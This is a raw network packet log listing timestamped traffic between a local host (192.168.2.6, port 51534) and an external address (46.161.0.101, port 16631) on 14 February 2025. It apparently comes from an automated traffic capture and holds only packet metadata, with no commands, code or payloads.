Feb 14, 2025 19:50:20.201328039 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201340914 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201354980 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201379061 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.201379061 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.201842070 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201884031 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201894999 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201916933 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201929092 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.201941013 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202042103 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.202042103 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.202042103 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.202579021 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202591896 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202603102 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202640057 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202649117 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.202649117 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.202652931 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202666998 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202678919 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202691078 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.202699900 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.202716112 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.203556061 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203568935 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203588009 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203599930 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203612089 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203623056 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203634977 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203645945 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.203671932 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.203671932 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.203671932 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.203671932 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.204478025 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204490900 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204504013 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204539061 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.204550028 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204562902 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204570055 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.204575062 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204587936 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204598904 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.204607010 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.204641104 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.205492020 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205506086 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205518961 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205530882 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205542088 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205553055 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205562115 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.205562115 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.205569029 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205583096 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.205605030 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.205605030 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.206355095 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206367970 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206381083 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206403971 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.206403971 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.206418037 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206430912 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206444025 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206455946 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206468105 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.206474066 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.206502914 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.207273960 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.211342096 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.271598101 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.271612883 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.271759033 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.275722980 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275738955 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275752068 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275769949 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275809050 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275820017 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275826931 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.275831938 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275952101 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275959969 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.275959969 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.275966883 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275979042 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.275991917 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276009083 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.276017904 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276034117 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276048899 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.276048899 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276062965 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.276071072 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276087999 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276096106 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.276107073 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.276329994 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.287854910 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.287882090 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.287894964 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.287954092 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.287966967 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.287977934 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.287988901 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288033009 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288050890 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288058043 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288059950 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288062096 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288074017 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288285017 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288296938 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288310051 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288346052 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288357019 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288368940 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288387060 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288434029 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288446903 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288459063 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288469076 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288491964 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288503885 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288515091 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288657904 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288685083 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.288685083 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289314985 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289330959 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289344072 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289355040 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289381981 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289393902 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289405107 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289405107 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289416075 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289427996 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289437056 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289447069 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289472103 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289484024 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289495945 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289506912 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289519072 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.289563894 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289563894 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289563894 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.289563894 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290205002 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290216923 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290229082 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290241003 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290251970 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290266037 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290317059 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290317059 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290332079 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290344954 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290357113 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290366888 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290378094 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290389061 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290400028 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290414095 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.290648937 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290648937 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290648937 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290648937 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.290648937 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.291152000 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291168928 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291182995 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291193008 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291203976 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291214943 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291229010 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.291237116 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.291249037 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291260958 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291273117 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291284084 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291301966 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291307926 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291332006 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.291332960 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.291344881 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291357040 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.291357994 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.291439056 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292161942 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292181015 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292192936 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292202950 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292213917 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292226076 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292237043 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292248011 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292264938 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292264938 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292278051 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292289972 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292305946 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292305946 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292320967 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292351007 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292361975 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292383909 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292608976 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292608976 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292608976 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.292922974 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292937040 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292948961 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292973995 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.292982101 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.293021917 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.293029070 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.293035984 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.293368101 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.344183922 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.362294912 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362349033 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362360001 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362373114 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362390995 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362407923 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362499952 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362510920 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362523079 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362548113 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362591982 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.362591982 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.362626076 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.362626076 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.362704992 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362718105 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362735987 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362746954 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362761021 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362771034 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.362790108 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363104105 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363152027 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363164902 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363318920 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363338947 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363348961 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.363349915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.363349915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.363352060 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363349915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.363349915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.363372087 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.363396883 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.363411903 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.374391079 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374403000 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374433994 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374478102 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374489069 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374547005 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374550104 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.374550104 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.374562979 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374576092 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374586105 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374684095 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.374684095 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.374821901 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374921083 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374933004 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374944925 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374955893 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374967098 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.374979019 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375211954 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375211954 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375211954 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375308990 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375332117 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375346899 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375368118 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375379086 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375390053 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375401974 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375428915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375428915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375428915 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375524998 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375536919 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375543118 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375554085 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375565052 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375576019 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375586987 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.375608921 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375608921 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.375657082 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376250029 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376262903 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376275063 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376313925 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376326084 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376337051 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376348019 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376382113 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376382113 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376382113 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376388073 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376400948 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376419067 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376434088 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376440048 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376457930 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376457930 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376470089 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376487970 CET	16631	51534	46.161.0.101	192.168.2.6
Feb 14, 2025 19:50:20.376548052 CET	51534	16631	192.168.2.6	46.161.0.101
Feb 14, 2025 19:50:20.376548052 CET	51534	16631	192.168.2.6	46.161.0.101
